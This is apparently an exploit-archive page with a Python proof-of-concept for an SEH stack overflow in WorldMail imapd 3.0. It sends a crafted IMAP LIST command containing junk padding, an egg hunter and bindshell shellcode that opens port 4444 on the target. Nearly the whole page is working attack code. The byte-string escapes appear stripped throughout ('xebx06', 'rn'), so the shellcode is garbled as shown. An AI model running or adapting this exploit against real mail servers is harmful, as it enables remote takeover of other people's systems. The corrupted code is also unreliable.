[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WorldMail imapd 3.0 SEH overflow (egg hunter)
# Published : 2012-01-12
# Author :
# Previous Title : CoDeSys SCADA v2.3 Webserver Stack Buffer Overflow
# Next Title : Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote C


#!/usr/bin/python
import sys
import socket

## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
## Tested on: XP SP3 en-us
## Author: TheXero
## Website: www.thexero.co.uk
## http://www.nullsecurity.net

## Check for parameters
if len(sys.argv) != 3:
	print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
	quit()

## Assigns the parameters
target = sys.argv[1]
port = int(sys.argv[2])

## Sets up the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

## Sets the variables
char = "}"
nseh = "xebx06x90x90"
seh = "x4ex3bx01x10" ## 10013B4E  |. 59             POP ECX mailcmn.dll
buffer = 'x90' * 8
shellcode = ("T00WT00W" ## Bindshell port 4444
"xbdxe8x39x05xa5xdbxdbxd9x74x24xf4x58x29xc9xb1"
"x56x31x68x13x03x68x13x83xc0xecxdbxf0x59x04x92"
"xfbxa1xd4xc5x72x44xe5xd7xe1x0cx57xe8x62x40x5b"
"x83x27x71xe8xe1xefx76x59x4fxd6xb9x5ax61xd6x16"
"x98xe3xaax64xccxc3x93xa6x01x05xd3xdbxe9x57x8c"
"x90x5bx48xb9xe5x67x69x6dx62xd7x11x08xb5xa3xab"
"x13xe6x1bxa7x5cx1ex10xefx7cx1fxf5xf3x41x56x72"
"xc7x32x69x52x19xbax5bx9axf6x85x53x17x06xc1x54"
"xc7x7dx39xa7x7ax86xfaxd5xa0x03x1fx7dx23xb3xfb"
"x7fxe0x22x8fx8cx4dx20xd7x90x50xe5x63xacxd9x08"
"xa4x24x99x2ex60x6cx7ax4ex31xc8x2dx6fx21xb4x92"
"xd5x29x57xc7x6cx70x30x24x43x8bxc0x22xd4xf8xf2"
"xedx4ex97xbex66x49x60xc0x5dx2dxfex3fx5dx4exd6"
"xfbx09x1ex40x2dx31xf5x90xd2xe4x5axc1x7cx56x1b"
"xb1x3cx06xf3xdbxb2x79xe3xe3x18x0cx23x2ax78x5d"
"xc4x4fx7ex70x48xd9x98x18x60x8fx33xb4x42xf4x8b"
"x23xbcxdexa7xfcx2ax56xaex3ax54x67xe4x69xf9xcf"
"x6fxf9x11xd4x8exfex3fx7cxd8xc7xa8xf6xb4x8ax49"
"x06x9dx7cxe9x95x7ax7cx64x86xd4x2bx21x78x2dxb9"
"xdfx23x87xdfx1dxb5xe0x5bxfax06xeex62x8fx33xd4"
"x74x49xbbx50x20x05xeax0ex9exe3x44xe1x48xbax3b"
"xabx1cx3bx70x6cx5ax44x5dx1ax82xf5x08x5bxbdx3a"
"xddx6bxc6x26x7dx93x1dxe3x8dxdex3fx42x06x87xaa"
"xd6x4bx38x01x14x72xbbxa3xe5x81xa3xc6xe0xcex63"
"x3bx99x5fx06x3bx0ex5fx03")

## Calculates the size of junk depending on the shellcode
junk = "x41" * (769 - len(shellcode))

## Egg Hunter
hunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05"
"x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7")

## Assembles the buffer
buffer = char + junk + shellcode + nseh + seh + hunter + char

## Connects
s.connect((target,port))
data=s.recv(1024)
s.send("a001 LIST " + buffer + "rn")
s.close()